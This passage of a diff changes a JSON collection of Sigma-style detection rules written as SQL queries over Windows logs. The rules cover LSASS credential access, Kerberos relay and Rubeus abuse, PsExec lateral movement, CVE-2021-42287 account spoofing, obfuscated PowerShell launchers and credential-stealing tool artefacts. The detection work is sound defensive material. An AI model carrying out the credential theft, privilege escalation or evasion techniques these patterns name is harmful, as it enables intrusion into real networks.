'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR TargetFilename LIKE '\\\\SystemRoot\\\\System32\\\\%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\Windows\\\\System32\\\\dism.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\%' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\SetupHost.exe' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\wbengine.exe' ESCAPE '\\') OR (NewProcessName LIKE '%:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bcdedit.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:Program Files\\\\WindowsApps\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\SecurityHealth\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\SecurityHealthSystray.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\SecurityHealthSetup.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4799' AND TargetUserName LIKE 'Administr%' ESCAPE '\\' AND CallerProcessName LIKE '%\\\\checkadmin.exe' ESCAPE '\\')" ], - "filename": "file_event_win_creation_system_file.yml" + "filename": "win_security_apt_wocao.yml" }, { - "title": "Potential Privilege Escalation 
Attempt Via .Exe.Local Technique", - "id": "07a99744-56ac-40d2-97b7-2095967b0e03", - "status": "experimental", - "description": "Detects potential privilege escalation attempt via the creation of the \"*.Exe.Local\" folder inside the \"System32\" directory in order to sideload \"comctl32.dll\"", - "author": "Nasreddine Bencherchali (Nextron Systems), Subhash P (@pbssubhash)", - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation" - ], + "title": "Suspicious Computer Account Name Change CVE-2021-42287", + "id": "45eb2ae2-9aa2-4c3a-99a5-6e5077655466", + "status": "test", + "description": "Detects the renaming of an existing computer account to a account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\logonUI.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\werFault.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\narrator.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wermgr.exe.local%' ESCAPE '\\') AND TargetFilename LIKE '%\\\\comctl32.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4781' AND OldTargetUserName LIKE '%$%' ESCAPE '\\') AND NOT (NewTargetUserName LIKE '%$%' ESCAPE '\\'))" ], - "filename": "file_event_win_system32_local_folder_privilege_escalation.yml" + "filename": "win_security_samaccountname_spoofing_cve_2021_42287.yml" }, { - "title": "Creation of an WerFault.exe in Unusual Folder", - "id": "28a452f3-786c-4fd8-b8f2-bddbe9d616d1", + "title": "Service Installed By Unusual Client - Security", + "id": "c4e92a97-a9ff-4392-9d2d-7a4c642768ca", "status": "experimental", - "description": "Detects 
WerFault copoed to a suspicious folder, which could be a sign of WerFault DLL hijacking", - "author": "frack113", + "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", + "author": "Tim Rauch", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1574.001" + "attack.privilege_escalation", + "attack.t1543" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wer.dll' ESCAPE '\\') AND NOT ((TargetFilename LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinSxS\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ClientProcessId = '0' OR ParentProcessId = '0'))" ], - "filename": "file_event_win_werfault_dll_hijacking.yml" + "filename": "win_security_service_installation_by_unusal_client.yml" }, { - "title": "Potential RipZip Attack on Startup Folder", - "id": "a6976974-ea6f-4e97-818e-ea08625c52cb", + "title": "Invoke-Obfuscation Via Use Clip - Security", + "id": "1a0a2ff1-611b-4dac-8216-8a7b47c618a6", "status": "experimental", - "description": "Detects a phishing attack which expands a ZIP file containing a malicious shortcut.\nIf the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder.\nAdditionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation.\n", - "author": "Greg (rule)", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + 
"attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup%' ESCAPE '\\' AND TargetFilename LIKE '%.lnk.{0AFACED1-E828-11D1-9187-B532F1E9575D}%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%(Clipboard|i%' ESCAPE '\\')" ], - "filename": "file_event_win_ripzip_attack.yml" + "filename": "win_security_invoke_obfuscation_via_use_clip_services_security.yml" }, { - "title": "Potential Startup Shortcut Persistence Via PowerShell.EXE", - "id": "92fa78e7-4d39-45f1-91a3-8b23f3f1088d", + "title": "KrbRelayUp Attack Pattern", + "id": "749c9f5e-b353-4b90-a9c1-05243357ca4b", "status": "experimental", - "description": "Detects PowerShell writing startup shortcuts.\nThis procedure was highlighted in Red Canary Intel Insights Oct. 2021, \"We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence.\nAccordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats.\nIn the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL\"\n", - "author": "Christopher Peacock '@securepeacock', SCYTHE", + "description": "Detects logon events that have characteristics of events generated during an attack with KrbRelayUp and the like", + "author": "@SBousseaden, Florian Roth", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.privilege_escalation", + "attack.credential_access" ], "falsepositives": [ - "Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware." 
+ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%\\\\start menu\\\\programs\\\\startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.lnk' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '3' AND AuthenticationPackageName = 'Kerberos' AND IpAddress = '127.0.0.1' AND TargetUserSid LIKE 'S-1-5-21-%' ESCAPE '\\' AND TargetUserSid LIKE '%-500' ESCAPE '\\')" ], - "filename": "file_event_win_powershell_startup_shortcuts.yml" + "filename": "win_security_susp_krbrelayup.yml" }, { - "title": "ISO File Created Within Temp Folders", - "id": "2f9356ae-bf43-41b8-b858-4496d83b2acb", - "status": "experimental", - "description": "Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022.", - "author": "@sam0x90", + "title": "Suspicious PsExec Execution", + "id": "c462f537-a1e3-41a6-b5fc-b2c2cef9bf82", + "status": "test", + "description": "detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one", + "author": "Samir Bousseaden", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Potential FP by sysadmin opening a zip file containing a legitimate ISO file" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.zip\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.iso' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\INetCache\\\\Content.Outlook\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.iso' ESCAPE '\\'))" + "SELECT * FROM 
logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND (RelativeTargetName LIKE '%-stdin' ESCAPE '\\' OR RelativeTargetName LIKE '%-stdout' ESCAPE '\\' OR RelativeTargetName LIKE '%-stderr' ESCAPE '\\')) AND NOT (RelativeTargetName LIKE 'PSEXESVC%' ESCAPE '\\'))" ], - "filename": "file_event_win_iso_file_mount.yml" + "filename": "win_security_susp_psexec.yml" }, { - "title": "Suspicious MSExchangeMailboxReplication ASPX Write", - "id": "7280c9f3-a5af-45d0-916a-bc01cb4151c9", - "status": "test", - "description": "Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation", - "author": "Florian Roth (Nextron Systems)", + "title": "LSASS Access from Non System Account", + "id": "962fe167-e48d-4fd6-9974-11e5b9a5d6d1", + "status": "experimental", + "description": "Detects potential mimikatz-like tools accessing LSASS from non system account", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.persistence", - "attack.t1505.003" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\MSExchangeMailboxReplication.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4663', '4656') AND AccessMask IN ('0x40', '0x1400', '0x100000', '0x1410', '0x1010', '0x1438', '0x143a', '0x1418', '0x1f0fff', '0x1f1fff', '0x1f2fff', '0x1f3fff', '40', '1400', '1000', '100000', '1410', '1010', '1438', '143a', '1418', '1f0fff', '1f1fff', '1f2fff', '1f3fff') AND ObjectType = 'Process' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\') AND NOT ((SubjectUserName LIKE '%$' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\') OR 
(ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND AccessMask = '0x1410') OR (ProcessName LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\')))" ], - "filename": "file_event_win_susp_exchange_aspx_write.yml" + "filename": "win_security_lsass_access_non_system_account.yml" }, { - "title": "UAC Bypass Using Windows Media Player - File", - "id": "68578b43-65df-4f81-9a9b-92f32711a951", + "title": "Reconnaissance Activity", + "id": "968eef52-9cff-4454-8992-1e74b9cbad6c", "status": "test", - "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects activity as \"net user administrator /domain\" and \"net group domain admins /domain\"", + "author": "Florian Roth (Nextron Systems), Jack Croock (method), Jonhnathan Ribeiro (improvements), oscd.community", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.discovery", + "attack.t1087.002", + "attack.t1069.002", + "attack.s0039" ], "falsepositives": [ - "Unknown" + "Administrator activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\OskSupport.dll' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\DllHost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4661' AND AccessMask = '0x2d' AND (ObjectType LIKE 'SAM\\_USER' ESCAPE '\\' OR ObjectType LIKE 'SAM\\_GROUP' ESCAPE '\\') AND ObjectName LIKE 'S-1-5-21-%' ESCAPE '\\' AND (ObjectName LIKE '%-500' ESCAPE '\\' OR ObjectName LIKE '%-512' ESCAPE '\\'))" ], - "filename": "file_event_win_uac_bypass_wmp.yml" + "filename": "win_security_susp_net_recon_activity.yml" }, { - "title": "Suspicious NTDS.DIT 
Creation", - "id": "4e7050dd-e548-483f-b7d6-527ab4fa784d", + "title": "SAM Registry Hive Handle Request", + "id": "f8748f2c-89dc-4d95-afb0-5a2dfdbad332", "status": "test", - "description": "Detects suspicious creations of a file named \"ntds.dit\" (Active Directory Database) by suspicious parent process, directory or a suspicious one liner", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects handles requested to SAM registry hive", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ + "attack.discovery", + "attack.t1012", "attack.credential_access", - "attack.t1003.003" + "attack.t1552.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\ntds.dit' ESCAPE '\\' AND ((ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\apache%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4656' AND ObjectType = 'Key' AND ObjectName LIKE '%\\\\SAM' ESCAPE '\\')" ], - "filename": "file_event_win_ntds_dit.yml" + "filename": 
"win_security_sam_registry_hive_handle_request.yml" }, { - "title": "NPPSpy Hacktool Usage", - "id": "cad1fe90-2406-44dc-bd03-59d0b58fe722", + "title": "Persistence and Execution at Scale via GPO Scheduled Task", + "id": "a8f29a7b-b137-4446-80a0-b804272f3da2", "status": "test", - "description": "Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file", - "author": "Florian Roth (Nextron Systems)", + "description": "Detect lateral movement using GPO scheduled task, usually used to deploy ransomware at scale", + "author": "Samir Bousseaden", "tags": [ - "attack.credential_access" + "attack.persistence", + "attack.lateral_movement", + "attack.t1053.005" ], "falsepositives": [ - "Unknown" + "If the source IP is not localhost then it's super suspicious, better to monitor both local and remote changes to GPO scheduledtasks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\NPPSpy.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\NPPSpy.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\SYSVOL' ESCAPE '\\' AND RelativeTargetName LIKE '%ScheduledTasks.xml' ESCAPE '\\' AND (Accesses LIKE '%WriteData%' ESCAPE '\\' OR Accesses LIKE '%\\%\\%4417%' ESCAPE '\\'))" ], - "filename": "file_event_win_hktl_nppspy.yml" + "filename": "win_security_gpo_scheduledtasks.yml" }, { - "title": "Rclone Config File Creation", - "id": "34986307-b7f4-49be-92f3-e7a4d01ac5db", - "status": "test", - "description": "Detects Rclone config file being created", - "author": "Aaron Greetham (@beardofbinary) - NCC Group", + "title": "DiagTrackEoP Default Login Username", + "id": "2111118f-7e46-4fc8-974a-59fd8ec95196", + "status": "experimental", + "description": "Detects the default \"UserName\" used by the DiagTrackEoP POC", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + 
"attack.privilege_escalation" ], "falsepositives": [ - "Legitimate Rclone usage (rare)" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\.config\\\\rclone\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND TargetOutboundUserName = 'thisisnotvaliduser')" ], - "filename": "file_event_win_rclone_exec_file.yml" + "filename": "win_security_diagtrack_eop_default_login_username.yml" }, { - "title": "UAC Bypass Using MSConfig Token Modification - File", - "id": "41bb431f-56d8-4691-bb56-ed34e390906f", - "status": "test", - "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Win Susp Computer Name Containing Samtheadmin", + "id": "39698b3f-da92-4bc6-bfb5-645a98386e45", + "status": "experimental", + "description": "Detects suspicious computer name samtheadmin-{1..100}$ generated by hacktool", + "author": "elhoim", "tags": [ - "attack.defense_evasion", + "cve.2021.42278", + "cve.2021.42287", + "attack.persistence", "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1078" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pkgmgr.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((SamAccountName LIKE 'SAMTHEADMIN-%' ESCAPE '\\' AND SamAccountName LIKE '%$' ESCAPE '\\') OR (TargetUserName LIKE 'SAMTHEADMIN-%' ESCAPE '\\' AND TargetUserName LIKE '%$' ESCAPE '\\')))" ], - "filename": "file_event_win_uac_bypass_msconfig_gui.yml" + "filename": "win_security_susp_computer_name.yml" }, { - "title": "CrackMapExec File Creation Patterns", - "id": "9433ff9c-5d3f-4269-99f8-95fc826ea489", + 
"title": "Invoke-Obfuscation Via Use MSHTA - Security", + "id": "9b8d9203-4e0f-4cd9-bb06-4cc4ea6d0e9a", "status": "experimental", - "description": "Detects suspicious file creation patterns found in logs when CrackMapExec is used", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\rundll32.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND (TargetFilename LIKE '%.rtf' ESCAPE '\\' OR TargetFilename LIKE '%.otf' ESCAPE '\\' OR TargetFilename LIKE '%.odt' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.doc' ESCAPE '\\' OR TargetFilename LIKE '%.pdf' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.wpd' ESCAPE '\\' OR TargetFilename LIKE '%.icns' ESCAPE '\\' OR TargetFilename LIKE '%.db' ESCAPE '\\' OR TargetFilename LIKE '%.ini' ESCAPE '\\' OR TargetFilename LIKE '%.tex' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.csv' ESCAPE '\\' OR TargetFilename LIKE '%.fon' ESCAPE '\\' OR TargetFilename LIKE '%.tar' ESCAPE '\\' OR TargetFilename LIKE '%.ttf' ESCAPE '\\' OR TargetFilename LIKE '%.xml' ESCAPE '\\' OR TargetFilename LIKE '%.cfg' ESCAPE '\\' OR TargetFilename LIKE '%.cpl' ESCAPE '\\' OR TargetFilename LIKE '%.jpg' ESCAPE '\\' OR TargetFilename LIKE '%.drv' ESCAPE '\\' OR TargetFilename LIKE '%.cur' ESCAPE '\\' OR TargetFilename LIKE '%.tmp' ESCAPE '\\')) OR (TargetFilename LIKE 
'C:\\\\Windows\\\\Temp\\\\procdump.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%mshta%' ESCAPE '\\' AND ServiceFileName LIKE '%vbscript:createobject%' ESCAPE '\\' AND ServiceFileName LIKE '%.run%' ESCAPE '\\' AND ServiceFileName LIKE '%window.close%' ESCAPE '\\')" ], - "filename": "file_event_win_crackmapexec_patterns.yml" + "filename": "win_security_invoke_obfuscation_via_use_mshta_services_security.yml" }, { - "title": "Suspicious Scheduled Task Write to System32 Tasks", - "id": "80e1f67a-4596-4351-98f5-a9c3efabac95", + "title": "Register new Logon Process by Rubeus", + "id": "12e6d621-194f-4f59-90cc-1959e21e69f7", "status": "test", - "description": "Detects the creation of tasks from processes executed from suspicious locations", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential use of Rubeus via registered new trusted logon process", + "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", "tags": [ - "attack.persistence", - "attack.execution", - "attack.t1053" + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.t1558.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Windows\\\\System32\\\\Tasks%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\PerfLogs%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\System32\\\\config\\\\systemprofile%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4611' AND LogonProcessName = 'User32LogonProcesss')" ], - "filename": "file_event_win_susp_task_write.yml" + "filename": "win_security_register_new_logon_process_by_rubeus.yml" }, { - "title": "Inveigh Execution Artefacts", - "id": "bb09dd3e-2b78-4819-8e35-a7c1b874e449", + "title": "Invoke-Obfuscation 
Via Use Rundll32 - Security", + "id": "cd0f7229-d16f-42de-8fe3-fba365fbcb3a", "status": "experimental", - "description": "Detects the presence and execution of Inveigh via dropped artefacts", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Inveigh-Log.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-Cleartext.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv1Users.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv2Users.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv1.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv2.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-FormInput.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-Relay.ps1' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND ServiceFileName LIKE '%rundll32%' ESCAPE '\\' AND ServiceFileName LIKE '%shell32.dll%' ESCAPE '\\' AND ServiceFileName LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ServiceFileName LIKE '%value%' ESCAPE '\\' OR ServiceFileName LIKE '%invoke%' ESCAPE '\\' OR ServiceFileName LIKE '%comspec%' ESCAPE '\\' OR ServiceFileName LIKE '%iex%' ESCAPE '\\'))" ], - "filename": "file_event_win_hktl_inveigh_artefacts.yml" + "filename": "win_security_invoke_obfuscation_via_use_rundll32_services_security.yml" }, { - "title": "Suspicious Double Extension Files", - "id": 
"b4926b47-a9d7-434c-b3a0-adc3fa0bd13e", + "title": "Remote WMI ActiveScriptEventConsumers", + "id": "9599c180-e3a8-4743-8f92-7fb96d3be648", + "status": "test", + "description": "Detect potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "tags": [ + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.003" + ], + "falsepositives": [ + "SCCM" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4624' AND LogonType = '3' AND ProcessName LIKE '%scrcons.exe' ESCAPE '\\') AND NOT (TargetLogonId = '0x3e7'))" + ], + "filename": "win_security_scrcons_remote_wmi_scripteventconsumer.yml" + }, + { + "title": "Invoke-Obfuscation Obfuscated IEX Invocation - Security", + "id": "fd0f5778-d3cb-4c9a-9695-66759d04702a", "status": "experimental", - "description": "Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that windows hide default extensions by default.", - "author": "Nasreddine Bencherchali (Nextron Systems), frack113", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1036.007" + "attack.t1027" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((TargetFilename LIKE '%.zip' ESCAPE '\\' OR TargetFilename LIKE '%.rar' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.doc.%' ESCAPE '\\' OR TargetFilename LIKE '%.docx.%' ESCAPE '\\' OR TargetFilename LIKE '%.xls.%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx.%' ESCAPE '\\' OR 
